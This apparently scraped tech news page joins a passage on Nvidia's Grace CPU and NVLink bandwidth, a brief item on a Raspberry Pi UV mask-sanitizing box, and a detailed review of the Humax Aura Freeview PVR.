Nvidia’s next-generation NVLink, which it hasn’t shared many details about yet, connects the chip to the adjacent CPU with a 900 GBps transfer rate (14X faster), outstripping the data transfer rates that are traditionally available from a CPU to a GPU by 30X. The company also claims the new design can transfer data between CPUs at twice the rate of standard designs, breaking the shackles of suboptimal data transfer rates between the various compute elements, like CPUs, GPUs, and system memory.
Image 1 of 3
Image 2 of 3
Image 3 of 3
The graphics above outline Nvidia’s primary problem with feeding its GPUs with enough bandwidth in a modern system. The first slide shows the bandwidth limitation of 64 GBps from memory to GPU in an x86 CPU-driven system, with the limitations of PCIe throughput (16 GBps) exacerbating the low throughput and ultimately limiting how much system memory the GPU can utilize fully. The second slide shows throughput with the Grace CPUs: With four NVLinks, throughput is boosted to 500 GBps, while memory-to-GPU throughput increases 30X to 2,000 GBps.
The NVLink implementation also provides cache coherency, which brings the system and GPU memory (LPDDR5x and HBM) under the same memory address space to simplify programming. Cache coherency also reduces data movement between the CPU and GPU, thus increasing both performance and efficiency. This addition allows Nvidia to offer similar functionality to AMD’s pairing of EPYC CPUs with Radeon Instinct GPUs in the Frontier exascale supercomputer, and also Intel’s combination of the Ponte Vecchio graphics cards with the Sapphire Rapids CPUs in the Aurora supercomputer, another world-leading exascale supercomputer.
Nvidia says this combination of features will reduce the amount of time it takes to train GPT-3, the world’s largest natural language AI model, with 2.8 AI-exaflops Selene, the world’s current fastest AI supercomputer, from fourteen days to two.
Nvidia also revealed a new roadmap that it says will dictate its cadence of updates over the next several years, with GPUs, CPUs (Arm and x86), and DPUs all co-existing and evolving on a steady cadence. Huang said the company would advance each architecture every two years, with a possible “kicker” generation in between, which likely will consist of smaller advances to process technology rather than architectures.
Image 1 of 4
Image 2 of 4
Image 3 of 4
Image 4 of 4
The US Department of Energy’s Los Alamos National Laboratory will build a Grace-powered supercomputer. This system will be built by HPE (the division formerly known as Cray) and will come online in 2023, but the DOE hasn’t shared many details about the new system.
The Grace CPU will also power what Nvidia touts as the world’s most powerful AI-capable supercomputer, the Alps system that will be deployed at the Swiss National Computing Center (CSCS). Alps will primarily serve European scientists and researchers when it comes online in 2023 for workloads like climate, molecular dynamics, computational fluid dynamics, and the like.
Given Nvidia’s interest in purchasing Arm, it’s natural to expect the company to begin broadening its relationships with existing Arm customers. To that effect, Nvidia will also bring support for its GPUs to Amazon Web Service’s powerful Graviton 2 Arm chips, which is a key addition as AWS adoption of the Arm architecture has led to broader uptake for cloud workloads.
Bringing home a used face mask can harbor unseen and unwanted bacteria. But we’ve noticed something over the years—where there’s a problem, there’s a Raspberry Pi solution! Today’s project tackles this issue and is known as the Box of Hope, developed by Jan-Hendrik Ewers, Sarah Swinton, and Martin Karel.
The best Raspberry Pi projects help make life easier, and this project takes a lot of guesswork out of mask sanitization. The Box of Hope has a sanitizing chamber that utilizes UV LEDs to sterilize fabric face masks. It also relies on wireless technology to issue daily usage reminders.
According to the dev team, the project was designed to be a box kept at the user’s home. It’s connected to the internet, which is necessary to send sanitization reminders to a given mobile device.
There are three major components in the project design: an API, a web app, and an I/O server. The RESTful API manages HTTP requests between the client and server. The I/O server runs on the Pi while the web app manages notifications.
If you want to read more about this project, visit the official Box of Hope website and project GitHub page.
As a Freeview PVR, the Humax Aura is hard to beat , but its incomplete smart platform requires a pause for thought
For
Excellent recording and playback
Full-bodied, exciting sound
Useful Aura mobile app
Against
No Netflix app
HDR picture could be better
User interface a touch convoluted
Even without an Oxbridge education, the Humax Aura PVR has managed to achieve a double first. It’s the first Freeview set-top box from Humax to use the Android TV operating system and also the first to be 4K HDR-enabled. How could we not be intrigued?
The Humax Aura can be a number of things to different people and it feels as though it has been priced to interest everyone. The most obvious use is as a Freeview Play recorder, with enough internal storage options to capture hours of live Full HD and standard-definition television.
With its Android TV platform, you can also use it as a Chromecast with benefits – a way of adding over 5000 apps and streaming services to feed your television or projector with plenty of 4K fun. With its USB sockets, hi-res audio and 3D home cinema codec support, there’s an option to use it for local film file playback too – it’s quite the box of tricks.
Pricing
The Humax Aura costs £249 for the 1TB model, which can store up to 250 hours of HD (or 500 of SD) programming, and £279 for the 2TB model, which can store up to 500 hours of Full HD (1000 of SD) programming.
If you’re serious enough about live TV to want to record it on a regular basis, then the extra £30 for double the amount of space feels like a no-brainer.
Features
Humax has had great success with its What Hi-Fi? Award-winning FVP-5000T set-top box and, four years down the line, a replacement has been long overdue. For both specs and looks, the Aura is the upgrade we’ve been waiting for.
Stand the two next to one another and the sculpted lines of the low slung Aura more easily fit into the category of contemporary industrial design.
The Aura is a tidy 26cm by 20cm box that takes up about the same space as your wi-fi router. Its gloss black body is accented by an LED strip on the underside, which changes from red to blue to violet to orange depending on whether it’s off, on, recording or recording in standby. It’s a useful indicator and reminiscent of K.I.T.T from Knight Rider in standby mode.
But if it’s a party at the front of the Aura, then around the back is the serious business. Here you’ll find the single HDMI 2.1-out along with USB 3.0 and USB 2.0 (Type A) sockets for local media. There’s also an optical audio-out and a LAN connection if you’d rather leave the 2.4/5GHz wi-fi alone.
The Aura remote is fully featured, with dedicated buttons for just about everything you could need, including shortcuts to streaming services, recordings, the guide, the Freeview Play platform and the Android TV homepage too. You’ll need to pair the remote with the Aura box using Bluetooth for the Google Assistant voice system to work.
Humax Aura tech specs
Tuners x3
Ports HDMI 2.1, USB 3.0, USB 2.0, optical-out
OS Android TV 9
Freeview Play Yes
Storage 1TB/2TB
Dimensions (hwd) 4.3 x 26 x 20cm
Weight 764g
The Humax Aura’s three Freeview Play tuners bring access to over 70 non-subscription live TV channels and over 20,000 hours of on-demand entertainment through the catch-up services, with BBC iPlayer, ITV Hub, All 4 and My5 all present. Those tuners allow you to pause and rewind TV, as well as record up to four channels while watching a fifth one live.
Unlike the older FVP-5000T, there’s no built-in app for streaming live TV or your recordings from the box to other devices around your home, though Humax says the same DLNA support will be added to the Aura in a forthcoming firmware update. The Aura mobile app will detect any DLNA or Chromecast-enabled devices on the same network as your box and allow you to play recordings or live channels to those, sourcing it from the Aura as a server.
For the time being, the Aura mobile app is a handy tool in its own right. It brings a full view of the electronic programme guide (EPG) to your small screen and allows users to schedule recordings, watch recordings and even enjoy live TV on mobile – just the ticket for keeping track of Countdown while you put the kettle on.
The Aura’s big-screen offering is also bolstered by Android TV, and that means another 5000 or so apps from Google Play are at your disposal, with subscription services such as Disney+ and Amazon Prime Video, alongside more UK-specific apps, such as BT Sport and UKTV Play.
There are significant gaps, though, including Britbox, Now TV and the Netflix app. Somewhat ironically, Netflix is actually one of the few non-catch-up apps available on the older FVP-5000T. Fortunately, the Aura’s built-in Chromecast functionality allows users to cast these missing apps from mobile, tablet or browser instead, but that solution won’t suit everyone. It’s also worth noting that casting won’t work for either Apple TV or Apple Music, which are also missing from the Aura.
Away from the video side, the hi-res audio support is a welcome addition. It means those connecting the Aura to a decent external speaker system can get a strong performance from locally stored or streamed audio files, even if connecting through the HDMI, which can handle up to 24-bit/192 kHz levels.
You’ll need to download a third-party app such as VLC to play local media and Plex if you want to connect a NAS drive or similar from your home network. The Aura’s support for 4K HDR (HDR10 and HLG) and 3D audio codecs offers the potential to do justice to any high-quality movie files you own.
Thanks to the quad-core 1.8GHz CPU and 3GB RAM combo, the whole experience feels snappy and well put together. From the remote to the on-screen navigation, the user experience will bend to your bidding without complaint.
The twinning of Freeview Play and Android TV 9.0 doesn’t make for the easiest of combinations, though. Each offers its own home page experience, leaving the user unsure as to which one to use. You’ll find some apps on both, but others just on one, and both home pages have their own settings menus. Fortunately, the shortcuts on the remote mean that you can sometimes go straight to whatever it is that you’re looking for, but that doesn’t really excuse the poor integration of the two interfaces.
Each interface is good in its own right, at least. We particularly like Freeview Play’s Kids’ Zone – a brightly coloured area with TV programmes specially selected for younger viewers. Content can be searched according to duration and timeslot, and parents can use this to block certain apps and channels from appearing.
Picture
The picture quality through the Freeview Play tuners in both SD and Full HD is every bit as good as that of the FVP-5000T. Watching Put Your Money Where Your Mouth Is on BBC2, we get some inviting shots of a French antiques market on a cloudless summer’s day. The cobbled streets and stalls are bright and colourful, but with a realistic sense of tonality and texture.
The Aura trades a touch of detail for this better blending and, while some might prefer harder edges to stone walls, it feels like a well-judged decision from Humax. There’s a proper sense of complexity to the bright blue TV shelf as one of the bargain hunters haggles over a few Euros. It makes for a more natural aesthetic to the picture and feels believable when upscaled to 4K.
That arrangement is justified even further when switching to SD on the BBC News channel. Low-res content can seem particularly harsh and blocky when upscaled, but the Aura’s slightly softer approach smooths out a few more of those unwanted edges than its predecessor and adds some much-needed subtlety to clothing colours and skin tones.
However, the app platform is not quite as adept. Compared with a budget streaming stick, the Aura’s skill with a 4K HDR app is a little less assured than it might be. We watch The Boys on Prime Video and while the picture is punchy and dynamic, some of the finer detail is lost, particularly at the brightest and darkest extremes of the contrast spectrum. Viewing a scene set in the White House, the backlit silk curtains are missing folds in the material and the Aura doesn’t reveal the number of freckles on ex-CIA Deputy Director Grace Mallory’s skin that we might expect.
The other slight drawback is that not all users will find the dynamic range and refresh rate content matching system easy to use. There are a few options and, without the right ones selected, app TV shows and films are often displayed incorrectly; motion is juddery and streams are often jumpy. It can be fixed using the remote while viewing, but it isn’t easy to do. Quality standalone streamers have options to automatically match the dynamic range and refresh rate of the source material, and the Aura should really have the same.
Sound
The Aura’s hi-res music support offers an excellent opportunity to get good quality sound from this box through both locally stored files and streamed music services. Plugging it into our reference system, we fire up the Tidal Masters version of Fortunate Son by Creedence Clearwater Revival and, by the standards of PVRs and video streamers, we’re struck by how well it captures the recording.
There’s a spacious sound to the vocals and guitars that gives a fabulous feel to the acoustics of the room where the recording was made. Compared with other, similarly priced streaming products, there is an added dimension to the track. There’s a good dose of dynamics that brings excitement and character to all of the instruments. We can visualise the drums at the start of the track and every time the first snare of each bar is hit with an accent.
The back and forth between the guitar and the vocals is like listening to a conversation. It’s a cohesive sound from top to bottom and we feel confident that there’s little we’re missing in the music. Some streamers at this level might offer a touch more crispness to the rhythm, but not without some loss of the excitement we get with the Aura.
All of that translates to an enjoyably emotional feel for home cinema as we switch to AV with the Live Aid scene at the end of Bohemian Rhapsody on Prime Video. The thuds of the kick drum are wonderfully solid and offer a genuine sense of timbre and resonance as the pedal first hits the skin at the beginning of the set.
When Brian May plays his solo at the end of the piece, it’s like he’s making his guitar sing. Again, the sense of place is captured brilliantly in a credible rendition of the sound of the old Wembley Stadium full of 72,000 people clapping in time and singing along to Radio Ga Ga.
Sound such as this is a huge leg up for any home cinema device. Whether capturing the atmosphere of a rock concert or the special effects of an action scene, the Aura really delivers on this front.
Verdict
The Humax Aura does its main job well. It’s an excellent Freeview recorder for both Full HD and standard definition with an easy-to-use TV guide, plenty of space and handy remote recording features. The problem is that Humax has offered – and is charging – more this time around and this box doesn’t deliver these extras quite so well.
If you’re going to promise more apps, then the omission of the most popular one of all is an issue. You also need to make sure your handling of streamed TV and film content is up to the same high standards as the competition, and that isn’t quite the case with the Aura. Tacking on the Android TV platform also means that the overall user interface loses a little focus.
While the Aura is spot on for sound, opting for the cheaper but still brilliant Humax FVP-5000T and buying a Google Chromecast with Google TV as well is a better option in terms of overall performance. The experience won’t feel much more split than the Aura already does but, more importantly, the smart offering will be more complete and a little better for picture quality too.
That said, if you have your heart set on a single box solution for your TV recording and video streaming, the Aura is a solid choice.
SCORES
Picture 4
Sound 5
Features 4
MORE:
Read our guide to the best set-top boxes
Read our Humax FVP-5000T review
We use cookies on our website to give you the most relevant experience. By clicking “Accept”, you consent to the use of ALL the cookies.
This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.